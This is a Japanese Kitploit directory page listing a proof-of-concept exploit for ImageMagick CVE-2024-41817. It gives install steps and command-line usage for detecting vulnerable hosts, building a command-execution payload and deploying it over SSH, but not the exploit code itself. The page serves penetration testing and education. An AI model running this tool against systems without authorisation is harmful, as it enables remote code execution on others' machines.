Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/dxsk/cve-2024-41817-poc
ペイロード生成脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト学習と教育
GitHubdxsk/cve-2024-41817-poc

CVE-2024-41817-poc

CVE-2024-41817 POC ImageMagick <= 7.1.1-35 任意コード実行

リポジトリを見る
41年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

ImageMagick 任意コード実行 (CVE-2024-41817)

ImageMagick バージョン <= 7.1.1-35 向けの Proof of Concept エクスプロイトで、悪意のある XML デリゲーションを介して任意コード実行を可能にします。

説明

このエクスプロイトは、特別に細工されたライブラリを介して任意コード実行を可能にする ImageMagick の脆弱性を利用します。このスクリプトは以下のことができます:

  • 脆弱な ImageMagick バージョンの検出
  • 悪意のあるペイロードの生成
  • エクスプロイトの自動展開と実行

必要条件

  • Python 3.11+
  • GCC >= 9.4.0
  • Python パッケージ:
    • paramiko

インストール

root@kitploit:~
git clone https://github.com/Dxsk/CVE-2024-41817-poc/
cd CVE-2024-41817-poc
pip install -r requirements.txt

使用方法

脆弱なバージョンの自動検出:

root@kitploit:~
python3 exploit.py -H <target> -p <port> -u <user> -P <password> -d

ペイロードのみのビルド:

root@kitploit:~
python3 exploit.py -c "command" -B

フルオートモード (検出、ビルド、展開):

root@kitploit:~
python3 exploit.py -c "command" -H <target> -p <port> -u <user> -P <password> -A

オプション:

  • -c, --command: 実行するコマンド (デフォルト: "id")
  • -H, --host: ターゲットホスト
  • -p, --port: SSH ポート (デフォルト: 22)
  • -u, --username: SSH ユーザー名
  • -P, --password: SSH パスワード
  • -d, --detection: 脆弱な ImageMagick を自動検出
  • -B, --build: ペイロードのみビルド
  • -A, --auto: フルオートモード
  • -v, --verbose: 詳細出力

テスト済み環境

  • Ubuntu 22.04.5 LTS
  • ImageMagick 7.1.1-35

作者

  • Daihyxsk
  • Github: https://github.com/Dxsk

参照

  • ImageMagick セキュリティアドバイザリ
  • CVE: CVE-2024-41817

免責事項

このツールは教育目的のみで使用してください。テストする許可を得たシステムに対してのみ使用してください。

ツールをダウンロード